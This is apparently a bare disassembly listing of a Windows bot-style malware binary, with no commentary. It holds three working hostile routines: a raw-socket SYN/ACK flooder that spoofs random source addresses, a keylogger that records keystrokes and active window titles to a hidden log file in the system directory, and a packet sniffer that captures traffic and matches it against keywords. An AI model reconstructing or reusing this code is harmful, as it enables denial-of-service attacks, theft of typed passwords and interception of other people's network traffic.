loc_401CE6: ; CODE XREF: sub_401A76+247�j
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push (offset loc_4242A7+1)
push eax
call sub_415480
lea eax, [ebp+var_F4]
push eax
call sub_40A5B3
add esp, 10h
jmp short loc_401D12
; ---------------------------------------------------------------------------
loc_401D0F: ; CODE XREF: sub_401A76+25B�j
; sub_401A76+269�j
mov ebx, [ebp+arg_8]
loc_401D12: ; CODE XREF: sub_401A76+78�j
; sub_401A76+297�j
push [ebp+var_C]
call ds:dword_436500 ; closesocket
pop esi
loc_401D1C: ; CODE XREF: sub_401A76+5B�j
call ds:dword_4363C8 ; WSACleanup
mov eax, ebx
loc_401D24: ; CODE XREF: sub_401A76+3B�j
pop edi
pop ebx
leave
retn
sub_401A76 endp
; =============== S U B R O U T I N E =======================================
sub_401D28 proc near ; CODE XREF: sub_4019D7+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_409410
push [esp+10h+arg_4]
mov esi, eax
call sub_4159EF
push [esp+14h+arg_8]
mov ebx, eax
call sub_4159EF
mov edi, eax
call sub_4154DC
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_401A76
add esp, 1Ch
test eax, eax
jnz short loc_401D73
push 1
pop eax
loc_401D73: ; CODE XREF: sub_401D28+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_401D28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D82 proc near ; DATA XREF: sub_40D2E0+2D38�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_422048
call edi ; GetTickCount
push eax
call sub_4154D2
pop ecx
push 0FFh
push 3
push 2
call ds:dword_4364E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_401E4B
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push (offset loc_42441B+1)
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401E2B
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40BAE7
add esp, 14h
loc_401E2B: ; CODE XREF: sub_401D82+84�j
lea eax, [ebp+var_440]
push eax
call sub_40A5B3
push [ebp+var_BC]
call sub_415248
pop ecx
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_401E4B: ; CODE XREF: sub_401D82+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call ds:dword_436448 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_401EC9
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset dword_4243D4
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401EA9
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40BAE7
add esp, 14h
loc_401EA9: ; CODE XREF: sub_401D82+102�j
lea eax, [ebp+var_440]
push eax
call sub_40A5B3
push [ebp+var_BC]
call sub_415248
pop ecx
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_401EC9: ; CODE XREF: sub_401D82+DF�j
lea eax, [ebp+var_23C]
push eax
call ds:dword_4364A8 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_401F39
lea eax, [ebp+var_440]
push offset dword_4243A4
push eax
call sub_415480
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_401F19
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40BAE7
add esp, 14h
loc_401F19: ; CODE XREF: sub_401D82+172�j
lea eax, [ebp+var_440]
push eax
call sub_40A5B3
push [ebp+var_BC]
call sub_415248
pop ecx
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_401F39: ; CODE XREF: sub_401D82+157�j
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_44], 2
push ebx
call ds:dword_436468 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call ds:dword_4364A8 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_401F71: ; CODE XREF: sub_401D82+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_402235
push 28h
mov [ebp+var_2C], 45h
call ds:dword_436468 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_401FE4
call sub_4154DC
mov esi, eax
shl esi, 8
call sub_4154DC
add esi, eax
shl esi, 8
call sub_4154DC
add esi, eax
shl esi, 8
call sub_4154DC
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_401FFA
; ---------------------------------------------------------------------------
loc_401FE4: ; CODE XREF: sub_401D82+233�j
push [ebp+var_240]
call sub_409526
pop ecx
push eax
call ds:dword_4364A8 ; inet_addr
mov [ebp+var_20], eax
loc_401FFA: ; CODE XREF: sub_401D82+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_402018
call sub_4154DC
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_40201E
; ---------------------------------------------------------------------------
loc_402018: ; CODE XREF: sub_401D82+284�j
push [ebp+var_B8]
loc_40201E: ; CODE XREF: sub_401D82+294�j
call ds:dword_436468 ; htons
mov [ebp+var_16], ax
call sub_4154DC
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_436468 ; htons
push 12345678h
mov [ebp+var_18], ax
call ds:dword_436464 ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jz short loc_40206E
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_4020CA
; ---------------------------------------------------------------------------
loc_40206E: ; CODE XREF: sub_401D82+2E1�j
lea eax, [ebp+var_1BC]
push offset aAck ; "ack"
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jz short loc_40208E
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_4020CA
; ---------------------------------------------------------------------------
loc_40208E: ; CODE XREF: sub_401D82+301�j
lea eax, [ebp+var_1BC]
push offset aRandom ; "random"
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jz short loc_4020CA
call sub_4154DC
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_4154DC
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_4020CA: ; CODE XREF: sub_401D82+2EA�j
; sub_401D82+30A�j ...
push 200h
mov [ebp+var_C], 50h
call ds:dword_436468 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call ds:dword_436468 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_415560
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_415560
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40957F
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_415560
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_415560
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_415500
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40957F
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_415560
add esp, 14h
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call ds:dword_4364CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4021B7
inc [ebp+arg_0]
jmp loc_401F71
; ---------------------------------------------------------------------------
loc_4021B7: ; CODE XREF: sub_401D82+42B�j
push [ebp+var_4]
call ds:dword_436500 ; closesocket
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push (offset loc_424333+1)
lea eax, [ebp+var_440]
push 200h
push eax
call sub_4159FA
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_402215
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40BAE7
add esp, 14h
loc_402215: ; CODE XREF: sub_401D82+46E�j
lea eax, [ebp+var_440]
push eax
call sub_40A5B3
push [ebp+var_BC]
call sub_415248
pop ecx
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
loc_402235: ; CODE XREF: sub_401D82+203�j
push [ebp+var_4]
call ds:dword_436500 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push offset loc_4242D4
push eax
call sub_415480
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_4022A6
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40BAE7
add esp, 14h
loc_4022A6: ; CODE XREF: sub_401D82+4FF�j
lea eax, [ebp+var_440]
push eax
call sub_40A5B3
push [ebp+var_BC]
call sub_415248
pop ecx
pop ecx
push ebx
call ds:dword_422044 ; ExitThread
sub_401D82 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022C6 proc near ; CODE XREF: sub_4023A7+B4�p
; sub_4023A7+253�p
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_42205C ; GetLocalTime
lea eax, [ebp+var_114]
push 104h
push eax
call ds:dword_422058 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push offset asc_424C0C ; "\\"
push eax
call sub_415BA0
lea eax, [ebp+var_114]
push offset dword_42AD9C
push eax
call sub_415BA0
lea eax, [ebp+var_114]
push offset aAb ; "ab"
push eax
call sub_415B78
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_40232D
push 1
pop eax
jmp short loc_4023A4
; ---------------------------------------------------------------------------
loc_40232D: ; CODE XREF: sub_4022C6+60�j
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_415B26
push esi
call sub_415AD0
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_4023A2
push [ebp+arg_0]
lea eax, [ebp+var_314]
push offset dword_424BCC
push 200h
push eax
call sub_4159FA
push 0
lea eax, [ebp+var_314]
push [ebp+arg_8C]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
call sub_40BAE7
add esp, 24h
loc_4023A2: ; CODE XREF: sub_4022C6+A3�j
xor eax, eax
loc_4023A4: ; CODE XREF: sub_4022C6+65�j
pop esi
leave
retn
sub_4022C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023A7 proc near ; DATA XREF: sub_40D2E0+1F95�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_4DC = byte ptr -4DCh
var_2DD = byte ptr -2DDh
var_2DC = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8DCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_8DC], 0
push 25h
and [ebp+var_4], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D8]
rep stosd
call ds:dword_4363F0 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_436404 ; GetWindowTextA
mov ebx, 200h
loc_402402: ; CODE XREF: sub_4023A7+2C7�j
push 8
call ds:dword_422054 ; Sleep
call ds:dword_4363F0 ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz short loc_40248A
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_436404 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_4DC]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax
call sub_415480
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4022C6
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_415500
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_415500
add esp, 0Ch
loc_40248A: ; CODE XREF: sub_4023A7+6C�j
mov [ebp+arg_0], (offset loc_424463+1)
loc_402491: ; CODE XREF: sub_4023A7+2BD�j
push 10h
call ds:dword_436348 ; GetKeyState
movsx esi, ax
mov eax, [ebp+arg_0]
mov edi, [eax-4]
push edi
call ds:dword_436434 ; GetAsyncKeyState
test ah, 80h
jz short loc_402529
push 14h
call ds:dword_436348 ; GetKeyState
test ax, ax
jz short loc_4024DA
cmp esi, 0FFFFFFFFh
jle short loc_4024DA
cmp edi, 40h
jle short loc_4024DA
cmp edi, 5Bh
jge short loc_4024DA
mov [ebp+edi*4+var_8DC], 1
jmp loc_402659
; ---------------------------------------------------------------------------
loc_4024DA: ; CODE XREF: sub_4023A7+112�j
; sub_4023A7+117�j ...
push 14h
call ds:dword_436348 ; GetKeyState
test ax, ax
jz short loc_402505
test esi, esi
jge short loc_402519
cmp edi, 40h
jle short loc_402505
cmp edi, 5Bh
jge short loc_402505
mov [ebp+edi*4+var_8DC], 2
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402505: ; CODE XREF: sub_4023A7+13E�j
; sub_4023A7+147�j ...
test esi, esi
jge short loc_402519
mov [ebp+edi*4+var_8DC], 3
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402519: ; CODE XREF: sub_4023A7+142�j
; sub_4023A7+160�j
mov [ebp+edi*4+var_8DC], 4
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402529: ; CODE XREF: sub_4023A7+105�j
mov esi, [ebp+edi*4+var_8DC]
lea eax, [ebp+edi*4+var_8DC]
test esi, esi
jz loc_402659
and dword ptr [eax], 0
lea eax, [ebp+var_2DC]
cmp edi, 8
push eax
jnz short loc_402561
call sub_415C80
and [ebp+eax+var_2DD], 0
pop ecx
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402561: ; CODE XREF: sub_4023A7+1A5�j
call sub_415C80
cmp eax, 1B9h
pop ecx
jbe short loc_402593
call ds:dword_4363F0 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_436404 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_4025D4
; ---------------------------------------------------------------------------
loc_402593: ; CODE XREF: sub_4023A7+1C5�j
cmp edi, 0Dh
jnz loc_40262B
lea eax, [ebp+var_2DC]
push eax
call sub_415C80
test eax, eax
pop ecx
jz loc_402659
call ds:dword_4363F0 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_436404 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSReturnS ; "%s (Return) (%s)"
loc_4025D4: ; CODE XREF: sub_4023A7+1EA�j
lea eax, [ebp+var_4DC]
push eax
call sub_415480
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4022C6
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_415500
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_415500
add esp, 0Ch
jmp short loc_402659
; ---------------------------------------------------------------------------
loc_40262B: ; CODE XREF: sub_4023A7+1EF�j
cmp esi, 1
jz short loc_402644
cmp esi, 3
jz short loc_402644
cmp esi, 2
jz short loc_40263F
cmp esi, 4
jnz short loc_402659
loc_40263F: ; CODE XREF: sub_4023A7+291�j
push [ebp+arg_0]
jmp short loc_40264B
; ---------------------------------------------------------------------------
loc_402644: ; CODE XREF: sub_4023A7+287�j
; sub_4023A7+28C�j
mov eax, [ebp+arg_0]
add eax, 7
push eax
loc_40264B: ; CODE XREF: sub_4023A7+29B�j
lea eax, [ebp+var_2DC]
push eax
call sub_415BA0
pop ecx
pop ecx
loc_402659: ; CODE XREF: sub_4023A7+12E�j
; sub_4023A7+159�j ...
add [ebp+arg_0], 14h
cmp [ebp+arg_0], offset dword_424B94
jl loc_402491
cmp [ebp+var_4], 0
jz loc_402402
push [ebp+var_D8]
call sub_415248
pop ecx
push 0
call ds:dword_422044 ; ExitThread
sub_4023A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402688 proc near ; DATA XREF: sub_40D2E0+1DDB�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_415D00
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_1C], 2
push esi
call ds:dword_436468 ; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_409526
pop ecx
push eax
call ds:dword_4364A8 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call ds:dword_4364E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_40275D
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_4255F4
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402740
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40BAE7
add esp, 14h
loc_402740: ; CODE XREF: sub_402688+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_40A5B3
push [ebp+var_30]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
loc_40275D: ; CODE XREF: sub_402688+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov ds:dword_43BECC[eax], edi
lea eax, [ebp+var_1C]
push eax
push edi
call ds:dword_436494 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4027E2
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_4255B0
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_4027BE
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40BAE7
add esp, 14h
loc_4027BE: ; CODE XREF: sub_402688+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_40A5B3
pop ecx
push edi
call ds:dword_436500 ; closesocket
push [ebp+var_30]
call sub_415248
pop ecx
push esi
call ds:dword_422044 ; ExitThread
loc_4027E2: ; CODE XREF: sub_402688+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call ds:dword_436414 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_402865
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_425568
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402841
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40BAE7
add esp, 14h
loc_402841: ; CODE XREF: sub_402688+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_40A5B3
pop ecx
push edi
call ds:dword_436500 ; closesocket
push [ebp+var_30]
call sub_415248
pop ecx
push esi
call ds:dword_422044 ; ExitThread
loc_402865: ; CODE XREF: sub_402688+177�j
push ebx
mov ebx, offset dword_424C68
loc_40286B: ; CODE XREF: sub_402688+21B�j
; sub_402688+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi
push esi
push eax
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call ds:dword_436480 ; recv
cmp eax, 0FFFFFFFFh
jz loc_40297D
cmp [ebp+var_102AB], 6
jnz short loc_40286B
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_40286B
lea eax, [ebp+var_1028C]
push offset aPsniff ; "[PSNIFF]"
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jnz short loc_40286B
mov eax, ebx
xor edi, edi
test eax, eax
jz short loc_40286B
mov [ebp+arg_0], ebx
loc_4028D9: ; CODE XREF: sub_402688+26C�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_415A50
pop ecx
test eax, eax
pop ecx
jnz short loc_4028FB
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_4028D9
jmp loc_40286B
; ---------------------------------------------------------------------------
loc_4028FB: ; CODE XREF: sub_402688+262�j
lea eax, [ebp+var_1028C]
push eax
push [ebp+var_102A0]
call ds:dword_4363A4 ; htons
movzx eax, ax
push eax
push [ebp+var_C]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, ds:dword_424C7C[eax*8]
push ds:off_424C58[eax*4]
lea eax, [ebp+var_2B4]
push offset unk_425518
push 200h
push eax
call sub_4159FA
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_40296B
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40BAE7
add esp, 14h
loc_40296B: ; CODE XREF: sub_402688+2C1�j
lea eax, [ebp+var_2B4]
push eax
call sub_40A5B3
pop ecx
jmp loc_40286B
; ---------------------------------------------------------------------------
loc_40297D: ; CODE XREF: sub_402688+20E�j
call ds:dword_4363FC ; WSAGetLastError
push eax
push offset unk_4254D4
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_4159FA
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_4029C3
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40BAE7
add esp, 14h
loc_4029C3: ; CODE XREF: sub_402688+319�j
lea eax, [ebp+var_2B4]
push eax
call sub_40A5B3
pop ecx
push [ebp+var_4]
call ds:dword_436500 ; closesocket
push [ebp+var_30]
call sub_415248
pop ecx
push esi
call ds:dword_422044 ; ExitThread
sub_402688 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4029E9 proc near ; CODE XREF: sub_402C5D+E�p
; sub_402C5D+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_4029E9 endp
; =============== S U B R O U T I N E =======================================
sub_4029F3 proc near ; CODE XREF: sub_402C5D+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
mov esi, ecx
push ebx
call sub_415D2F
mov edi, eax
pop ecx
test edi, edi
jz short loc_402A25
push ebx
push 0
push edi
call sub_415500
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_415560
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_402A25: ; CODE XREF: sub_4029F3+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_4029F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A2D proc near ; CODE XREF: sub_402B27+18�p
; sub_402BA1+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_415D2F
mov esi, eax
pop ecx
test esi, esi
jz short loc_402A79
push edi
push 0
push esi
call sub_415500
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_415560
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_415560
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_402A79: ; CODE XREF: sub_402A2D+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_402A2D endp
; =============== S U B R O U T I N E =======================================
sub_402A82 proc near ; CODE XREF: sub_402B27+5E�p
; sub_402B27+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_402A92
push eax
call sub_415DE1
pop ecx
loc_402A92: ; CODE XREF: sub_402A82+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_402A82 endp
; =============== S U B R O U T I N E =======================================
sub_402A9B proc near ; CODE XREF: sub_402B27+20�p
; sub_402C02+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
